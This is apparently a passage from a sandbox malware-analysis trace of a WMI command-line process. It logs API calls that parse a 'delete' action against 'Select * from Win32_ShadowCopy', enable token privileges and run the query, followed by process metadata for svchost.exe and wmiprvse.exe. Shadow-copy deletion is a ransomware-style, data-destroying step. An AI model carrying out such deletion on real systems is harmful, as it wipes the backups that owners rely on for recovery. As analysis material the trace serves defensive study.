dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0199.857] lstrlenW (lpString="SET") returned 3 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0199.857] lstrlenW (lpString="CREATE") returned 6 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0199.857] lstrlenW (lpString="CALL") returned 4 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0199.857] lstrlenW (lpString="ASSOC") returned 5 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0199.858] lstrlenW (lpString="DELETE") returned 6 [0199.858] lstrlenW (lpString="delete") returned 6 [0199.858] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0199.858] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0199.858] malloc (_Size=0x3e) returned 0x2acac0 [0199.858] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0199.858] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0199.858] malloc (_Size=0x18) returned 0x2ac930 [0199.858] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0199.858] lstrlenW (lpString="FROM") returned 4 [0199.858] lstrlenW (lpString="*") returned 1 [0199.858] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0199.858] malloc (_Size=0x18) returned 0x2ac8b0 [0199.858] free (_Block=0x2ac930) [0199.858] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53007f00780008 | out: _String=0x0, _Context=0x53007f00780008) returned="from" [0199.858] lstrlenW (lpString="FROM") returned 4 [0199.858] lstrlenW (lpString="from") returned 4 [0199.858] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0199.858] malloc (_Size=0x18) returned 0x2ac930 [0199.859] free (_Block=0x2ac8b0) [0199.859] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008000780008 | out: _String=0x0, _Context=0x53008000780008) returned="Win32_ShadowCopy" [0199.859] malloc (_Size=0x18) returned 0x2ac8b0 [0199.859] free (_Block=0x2ac930) [0199.859] free (_Block=0x2acac0) [0199.859] free (_Block=0x2ac8b0) [0199.859] lstrlenW (lpString="SET") returned 3 [0199.859] lstrlenW (lpString="delete") returned 6 [0199.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0199.859] lstrlenW (lpString="CREATE") returned 6 [0199.859] lstrlenW (lpString="delete") returned 6 [0199.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0199.859] free (_Block=0x2ac7f0) [0199.859] malloc (_Size=0x8) returned 0x2acac0 [0199.859] lstrlenW (lpString="GET") returned 3 [0199.859] lstrlenW (lpString="delete") returned 6 [0199.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0199.859] lstrlenW (lpString="LIST") returned 4 [0199.859] lstrlenW (lpString="delete") returned 6 [0199.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0199.859] lstrlenW (lpString="ASSOC") returned 5 [0199.859] lstrlenW (lpString="delete") returned 6 [0199.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0199.859] WbemLocator:IUnknown:AddRef (This=0x1e61390) returned 0x3 [0199.859] free (_Block=0x42dfb0) [0199.860] lstrlenW (lpString="") returned 0 [0199.860] lstrlenW (lpString="XDUWTFONO") returned 9 [0199.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0199.860] lstrlenW (lpString="XDUWTFONO") returned 9 [0199.860] malloc (_Size=0x14) returned 0x2ac7f0 [0199.860] lstrlenW (lpString="XDUWTFONO") returned 9 [0199.860] GetCurrentThreadId () returned 0xa44 [0199.860] GetCurrentProcess () returned 0xffffffffffffffff [0199.860] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cf580 | out: TokenHandle=0x1cf580*=0x280) returned 1 [0199.860] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf578 | out: TokenInformation=0x0, ReturnLength=0x1cf578) returned 0 [0199.860] malloc (_Size=0x118) returned 0x2acae0 [0199.860] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x2acae0, TokenInformationLength=0x118, ReturnLength=0x1cf578 | out: TokenInformation=0x2acae0, ReturnLength=0x1cf578) returned 1 [0199.860] AdjustTokenPrivileges (in: TokenHandle=0x280, DisableAllPrivileges=0, NewState=0x2acae0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1167117754, Attributes=0x33f1), (Luid.LowPart=0x0, Luid.HighPart=4382640, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=939524923, Attributes=0x33e6), (Luid.LowPart=0x0, Luid.HighPart=2752856, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0199.860] free (_Block=0x2acae0) [0199.860] CloseHandle (hObject=0x280) returned 1 [0199.860] lstrlenW (lpString="GET") returned 3 [0199.860] lstrlenW (lpString="delete") returned 6 [0199.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0199.860] lstrlenW (lpString="LIST") returned 4 [0199.860] lstrlenW (lpString="delete") returned 6 [0199.861] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0199.861] lstrlenW (lpString="SET") returned 3 [0199.861] lstrlenW (lpString="delete") returned 6 [0199.861] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0199.861] lstrlenW (lpString="CALL") returned 4 [0199.861] lstrlenW (lpString="delete") returned 6 [0199.861] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0199.861] lstrlenW (lpString="ASSOC") returned 5 [0199.861] lstrlenW (lpString="delete") returned 6 [0199.861] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0199.861] lstrlenW (lpString="CREATE") returned 6 [0199.861] lstrlenW (lpString="delete") returned 6 [0199.861] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0199.861] lstrlenW (lpString="DELETE") returned 6 [0199.861] lstrlenW (lpString="delete") returned 6 [0199.861] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0199.862] malloc (_Size=0x18) returned 0x2ac8b0 [0199.862] lstrlenA (lpString="") returned 0 [0199.862] malloc (_Size=0x2) returned 0x42dfb0 [0199.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff58314c, cbMultiByte=-1, lpWideCharStr=0x42dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0199.862] free (_Block=0x42dfb0) [0199.862] malloc (_Size=0x18) returned 0x2ac930 [0199.862] lstrlenA (lpString="") returned 0 [0199.862] malloc (_Size=0x2) returned 0x42dfb0 [0199.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff58314c, cbMultiByte=-1, lpWideCharStr=0x42dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0199.862] free (_Block=0x42dfb0) [0199.862] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0199.862] malloc (_Size=0x3e) returned 0x2acae0 [0199.862] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0199.862] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0199.862] malloc (_Size=0x18) returned 0x2ac9d0 [0199.863] free (_Block=0x2ac930) [0199.863] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008400680007 | out: _String=0x0, _Context=0x53008400680007) returned="*" [0199.863] lstrlenW (lpString="FROM") returned 4 [0199.863] lstrlenW (lpString="*") returned 1 [0199.863] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0199.863] malloc (_Size=0x18) returned 0x2ac930 [0199.863] free (_Block=0x2ac9d0) [0199.863] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008500680007 | out: _String=0x0, _Context=0x53008500680007) returned="from" [0199.863] lstrlenW (lpString="FROM") returned 4 [0199.863] lstrlenW (lpString="from") returned 4 [0199.863] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0199.863] malloc (_Size=0x18) returned 0x2ac9d0 [0199.863] free (_Block=0x2ac930) [0199.863] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008600680007 | out: _String=0x0, _Context=0x53008600680007) returned="Win32_ShadowCopy" [0199.863] malloc (_Size=0x18) returned 0x2ac930 [0199.863] free (_Block=0x2ac9d0) [0199.863] free (_Block=0x2acae0) [0199.863] malloc (_Size=0x18) returned 0x2ac9d0 [0199.863] malloc (_Size=0x18) returned 0x2ac8d0 [0199.863] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0199.863] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0199.863] free (_Block=0x2ac8b0) [0199.864] free (_Block=0x2ac9d0) [0199.864] ??0CHString@@QEAA@XZ () returned 0x1cf4f0 [0199.864] GetCurrentThreadId () returned 0xa44 [0199.864] malloc (_Size=0x18) returned 0x2ac9d0 [0199.864] malloc (_Size=0x18) returned 0x2ac8b0 [0199.864] malloc (_Size=0x18) returned 0x2ac950 [0199.864] malloc (_Size=0x18) returned 0x2ac970 [0199.864] malloc (_Size=0x18) returned 0x2ac990 [0199.864] SysStringLen (param_1="\\\\") returned 0x2 [0199.864] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0199.864] malloc (_Size=0x18) returned 0x2ac9b0 [0199.864] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0199.864] SysStringLen (param_1="\\") returned 0x1 [0199.864] malloc (_Size=0x18) returned 0x2ac9f0 [0199.864] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0199.864] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0199.864] free (_Block=0x2ac9b0) [0199.864] free (_Block=0x2ac990) [0199.864] free (_Block=0x2ac970) [0199.865] free (_Block=0x2ac950) [0199.865] free (_Block=0x2ac8b0) [0199.865] free (_Block=0x2ac9d0) [0199.865] malloc (_Size=0x18) returned 0x2ac9d0 [0199.865] malloc (_Size=0x18) returned 0x2ac8b0 [0199.865] malloc (_Size=0x18) returned 0x2ac950 [0199.865] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e61390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff5f29d0 | out: ppNamespace=0xff5f29d0*=0x1e73c18) returned 0x0 [0199.914] free (_Block=0x2ac950) [0199.914] free (_Block=0x2ac8b0) [0199.914] free (_Block=0x2ac9d0) [0199.914] CoSetProxyBlanket (pProxy=0x1e73c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0199.914] free (_Block=0x2ac9f0) [0199.914] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0199.914] ??0CHString@@QEAA@XZ () returned 0x1cf440 [0199.914] GetCurrentThreadId () returned 0xa44 [0199.914] malloc (_Size=0x18) returned 0x2ac9f0 [0199.914] lstrlenA (lpString="") returned 0 [0199.915] malloc (_Size=0x2) returned 0x42dfb0 [0199.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff58314c, cbMultiByte=-1, lpWideCharStr=0x42dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0199.915] free (_Block=0x42dfb0) [0199.915] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0199.915] SysStringLen (param_1="") returned 0x0 [0199.915] free (_Block=0x2ac9f0) [0199.915] malloc (_Size=0x18) returned 0x2ac9f0 [0199.915] IWbemServices:ExecQuery (in: This=0x1e73c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x1cf448 | out: ppEnum=0x1cf448*=0x1e73d18) returned 0x0 [0202.066] free (_Block=0x2ac9f0) [0202.066] CoSetProxyBlanket (pProxy=0x1e73d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0202.068] IEnumWbemClassObject:Next (in: This=0x1e73d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf450, puReturned=0x1cf460 | out: apObjects=0x1cf450*=0x0, puReturned=0x1cf460*=0x0) returned 0x1 [0202.125] IUnknown:Release (This=0x1e73d18) returned 0x0 [0202.125] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0202.125] free (_Block=0x2ac930) [0202.125] free (_Block=0x2ac8d0) [0202.125] GetCurrentThreadId () returned 0xa44 [0202.125] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf628 [0202.125] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1cf628 [0202.125] malloc (_Size=0x800) returned 0x2acb60 [0202.125] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x2acb60, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0202.126] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0202.126] malloc (_Size=0x1c) returned 0x2acae0 [0202.126] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x2acae0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0202.126] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0202.127] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0202.127] free (_Block=0x2acae0) [0202.127] free (_Block=0x2acb60) [0202.127] ??1CHString@@QEAA@XZ () returned 0x7b90ce01 [0202.127] WbemLocator:IUnknown:Release (This=0x1e73c18) returned 0x0 [0202.127] ?Empty@CHString@@QEAAXXZ () returned 0x7fef931482c [0202.127] _kbhit () returned 0x0 [0202.665] free (_Block=0x2acac0) [0202.666] free (_Block=0x2ac7d0) [0202.667] free (_Block=0x2ac7b0) [0202.667] free (_Block=0x2ac790) [0202.667] free (_Block=0x2ac770) [0202.667] free (_Block=0x2a85c0) [0202.667] free (_Block=0x2ac870) [0202.667] free (_Block=0x2a8640) [0202.667] free (_Block=0x2ac8f0) [0202.667] free (_Block=0x2aca40) [0202.667] free (_Block=0x2ac890) [0202.667] free (_Block=0x2ac910) [0202.667] free (_Block=0x2a6e10) [0202.667] free (_Block=0x2a6cf0) [0202.667] free (_Block=0x2aca90) [0202.667] ?Empty@CHString@@QEAAXXZ () returned 0x7fef931482c [0202.667] free (_Block=0x2a8600) [0202.667] free (_Block=0x2ac810) [0202.667] free (_Block=0x2ac830) [0202.667] free (_Block=0x2a63c0) [0202.667] free (_Block=0x2a6410) [0202.667] free (_Block=0x2a6460) [0202.667] free (_Block=0x2ac7f0) [0202.667] free (_Block=0x2a7fb0) [0202.668] free (_Block=0x2a6cd0) [0202.668] free (_Block=0x2a8040) [0202.668] free (_Block=0x2a68b0) [0202.668] free (_Block=0x2a8000) [0202.668] free (_Block=0x2a6850) [0202.668] free (_Block=0x2a6870) [0202.668] free (_Block=0x2a6730) [0202.668] free (_Block=0x2a6750) [0202.668] free (_Block=0x2a66d0) [0202.668] free (_Block=0x2a66f0) [0202.668] free (_Block=0x2a6790) [0202.668] free (_Block=0x2a67b0) [0202.668] free (_Block=0x2a67f0) [0202.668] free (_Block=0x2a6810) [0202.668] free (_Block=0x2a6610) [0202.668] free (_Block=0x2a6630) [0202.668] free (_Block=0x2a65b0) [0202.668] free (_Block=0x2a65d0) [0202.668] free (_Block=0x2a6670) [0202.668] free (_Block=0x2a6690) [0202.669] free (_Block=0x2a6550) [0202.669] free (_Block=0x2a6570) [0202.669] free (_Block=0x2a64e0) [0202.669] free (_Block=0x2a64b0) [0202.669] free (_Block=0x2a6d80) [0202.669] WbemLocator:IUnknown:Release (This=0x1e61390) returned 0x2 [0202.669] WbemLocator:IUnknown:Release (This=0x1e73b28) returned 0x0 [0202.712] WbemLocator:IUnknown:Release (This=0x1e73a98) returned 0x0 [0202.712] WbemLocator:IUnknown:Release (This=0x1e61390) returned 0x1 [0202.712] ?Empty@CHString@@QEAAXXZ () returned 0x7fef931482c [0202.712] WbemLocator:IUnknown:Release (This=0x1e61390) returned 0x0 [0202.712] free (_Block=0x2ac6f0) [0202.713] free (_Block=0x2ac710) [0202.713] free (_Block=0x2a8540) [0202.713] free (_Block=0x2ac730) [0202.713] free (_Block=0x2ac750) [0202.713] free (_Block=0x2a8580) [0202.713] free (_Block=0x2ac570) [0202.713] free (_Block=0x2ac590) [0202.713] free (_Block=0x2a83c0) [0202.713] free (_Block=0x2ac5b0) [0202.713] free (_Block=0x2ac5d0) [0202.713] free (_Block=0x2a8400) [0202.713] free (_Block=0x2ac4f0) [0202.713] free (_Block=0x2ac510) [0202.713] free (_Block=0x2a8340) [0202.713] free (_Block=0x2ac530) [0202.713] free (_Block=0x2ac550) [0202.713] free (_Block=0x2a8380) [0202.713] free (_Block=0x2ac670) [0202.714] free (_Block=0x2ac690) [0202.714] free (_Block=0x2a84c0) [0202.714] free (_Block=0x2ac6b0) [0202.714] free (_Block=0x2ac6d0) [0202.714] free (_Block=0x2a8500) [0202.714] free (_Block=0x2ac470) [0202.714] free (_Block=0x2ac490) [0202.714] free (_Block=0x2a82c0) [0202.714] free (_Block=0x2ac4b0) [0202.714] free (_Block=0x2ac4d0) [0202.714] free (_Block=0x2a8300) [0202.714] free (_Block=0x2ac5f0) [0202.714] free (_Block=0x2ac610) [0202.714] free (_Block=0x2a8440) [0202.714] free (_Block=0x2ac630) [0202.714] free (_Block=0x2ac650) [0202.714] free (_Block=0x2a8480) [0202.715] free (_Block=0x2ac3b0) [0202.715] free (_Block=0x2ac3d0) [0202.715] free (_Block=0x2a8200) [0202.715] free (_Block=0x2ac270) [0202.715] free (_Block=0x2ac290) [0202.715] free (_Block=0x2a80c0) [0202.715] free (_Block=0x2a6d40) [0202.715] free (_Block=0x2a6d60) [0202.715] free (_Block=0x2a8080) [0202.715] free (_Block=0x2ac2f0) [0202.715] free (_Block=0x2ac310) [0202.715] free (_Block=0x2a8140) [0202.715] free (_Block=0x2ac3f0) [0202.715] free (_Block=0x2ac410) [0202.715] free (_Block=0x2a8240) [0202.715] free (_Block=0x2ac2b0) [0202.716] free (_Block=0x2ac2d0) [0202.716] free (_Block=0x2a8100) [0202.716] free (_Block=0x2ac330) [0202.716] free (_Block=0x2ac350) [0202.716] free (_Block=0x2a8180) [0202.716] free (_Block=0x2ac370) [0202.716] free (_Block=0x2ac390) [0202.716] free (_Block=0x2a81c0) [0202.716] free (_Block=0x2ac430) [0202.716] free (_Block=0x2ac450) [0202.716] free (_Block=0x2a8280) [0202.716] CoUninitialize () [0202.778] exit (_Code=0) [0202.778] free (_Block=0x2a6e80) [0202.778] free (_Block=0x2a7c40) [0202.778] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0202.778] free (_Block=0x2a6e30) [0202.778] free (_Block=0x2a6530) [0202.778] free (_Block=0x2a7c00) [0202.778] free (_Block=0x2a7bc0) [0202.778] free (_Block=0x2a7b70) [0202.778] free (_Block=0x2a7b30) [0202.778] free (_Block=0x2a5ac0) [0202.778] free (_Block=0x2a7ab0) [0202.778] free (_Block=0x2a5a80) [0202.778] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0202.778] free (_Block=0x2ac850) Thread: id = 323 os_tid = 0x130 Thread: id = 324 os_tid = 0xa4c Thread: id = 325 os_tid = 0x158 Thread: id = 326 os_tid = 0xa48 Thread: id = 327 os_tid = 0x68c Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 328 os_tid = 0x30c Thread: id = 329 os_tid = 0xfc8 Thread: id = 330 os_tid = 0xfe8 Thread: id = 331 os_tid = 0xfe4 Thread: id = 332 os_tid = 0xfe0 Thread: id = 333 os_tid = 0xfdc Thread: id = 334 os_tid = 0xfd8 Thread: id = 335 os_tid = 0xfd4 Thread: id = 336 os_tid = 0xfd0 Thread: id = 337 os_tid = 0xfa0 Thread: id = 338 os_tid = 0x618 Thread: id = 339 os_tid = 0xa90 Thread: id = 340 os_tid = 0xb9c Thread: id = 341 os_tid = 0xb48 Thread: id = 342 os_tid = 0x42c Thread: id = 343 os_tid = 0x1e4 Thread: id = 344 os_tid = 0x74c Thread: id = 345 os_tid = 0x6d0 Thread: id = 346 os_tid = 0x6bc Thread: id = 347 os_tid = 0x6b0 Thread: id = 348 os_tid = 0x698 Thread: id = 349 os_tid = 0x684 Thread: id = 350 os_tid = 0x678 Thread: id = 351 os_tid = 0x4a8 Thread: id = 352 os_tid = 0x46c Thread: id = 353 os_tid = 0x44c Thread: id = 354 os_tid = 0x424 Thread: id = 355 os_tid = 0x41c Thread: id = 356 os_tid = 0x404 Thread: id = 357 os_tid = 0x14c Thread: id = 358 os_tid = 0x3fc Thread: id = 359 os_tid = 0x3f4 Thread: id = 360 os_tid = 0x3e8 Thread: id = 361 os_tid = 0x39c Thread: id = 362 os_tid = 0x390 Thread: id = 363 os_tid = 0x37c Thread: id = 364 os_tid = 0x374 Thread: id = 373 os_tid = 0xa74 Thread: id = 374 os_tid = 0xf18 Thread: id = 375 os_tid = 0x708 Thread: id = 376 os_tid = 0xac0 Process: id = "9" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x62564000" os_pid = "0xa64" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 365 os_tid = 0xf64 Thread: id = 366 os_tid = 0xa88 Thread: id = 367 os_tid = 0xa84 Thread: id = 368 os_tid = 0xa80 Thread: id = 369 os_tid = 0xa7c Thread: id = 370 os_tid = 0xa78 Thread: id = 371 os_tid = 0xa6c Thread: id = 372 os_tid = 0xa68 Process: id = "10" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x4ff98000" os_pid = "0x75c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT 